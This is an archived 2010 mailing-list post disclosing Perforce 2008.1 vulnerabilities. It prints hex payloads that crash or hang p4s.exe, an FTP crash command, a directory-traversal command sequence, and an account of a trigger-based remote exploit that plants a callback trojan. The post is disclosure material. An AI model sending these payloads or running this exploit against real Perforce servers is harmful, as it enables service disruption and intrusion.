Dailydave mailing list archives
Perforce
From: Intevydis <admin () vulndisco net>
Date: Thu, 04 Mar 2010 18:18:53 +0300
Hi, Usually I tend to ignore articles related to "sophisticated" aurora attacks but according to http://www.wired.com/threatlevel/2010/03/source-code-hacks many companies use Perforce, big surprise.. About two years ago we've performed a quick testing of Perforce 2008.1 and released some bugs with Vulndisco: 1. p4s.exe DoS (crash) to trigger send the following data to port " s="\x4c\xb3\xff\xff\xff\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00" s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\x02\x00\x00\x00\x36\x33\x00" 2. p4s.exe Dos (infinite loop) to trigger: s="\x1b\x1b\x00\x00\x00\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00" s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\xdc\xff\xff\xff\x36\x33\x00" 3. another p4s.exe crash: s="\x4c\x4c\x00\x00\x00\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00" s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\x02\x00\x00\x00\x36\x33\x00" s+="\x61\x70\x69\x00\x0c\xff\xff\xff\x39\x39\x39\x39\x39\x00\x73\x6e" s+="\x64\x62\x75\x66\x00\x05\x00\x00\x00\x36\x35\x35\x33\x36\x00\x66" s+="\x75\x6e\x63\x00\x08\x00\x00\x00\x70\x72\x6f\x74\x6f\x63\x6f\x6c" s+="\x00" 4. perforce Ftp server null ptr crash to trigger - "MKD x\r\n" 5. Perforce dir traversal Trivial bug, on Windows it is possible to create files outside of repository directory, something like: $ echo TESTTEST > "..\\..\\..\\..\\..\\..\\..\\test.txt" $ p4 add "..\\..\\..\\..\\..\\..\\..\\test.txt" //depot/..\..\..\..\..\..\..\test.txt#1 - opened for add $ p4 submit on Windows box file C:\test.txt,v will be created 6. remote exploit We've exploted triggers feature of Perforce server , triggers allows us to run external OS commands. To use this bug you will need account with 'super' privileges', how you can get it: 1. easy way - there is an empty protection table, so the first user who will run 'p4 protect' will be superuser (another nice feature of Perforce) 2. hard way - run 'p4 protects', see who has super privileges and brute force his account So, in our exploit we've been using 'form-in' trigger, it will be fired each time when we try define new client ('p4 client'). Our trigger saves mosdef callback trojan in /tmp and executes it. Of course all these bugs might be fixed now - no surprise, we've found them ~ 2 years ago. Do not get me wrong, our perforce's skill level is nothing compared to mcafee experts, we are just scripts kiddies playing with wireshark and netcat. Regards, Evgeny L. _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- Perforce Intevydis (Mar 04)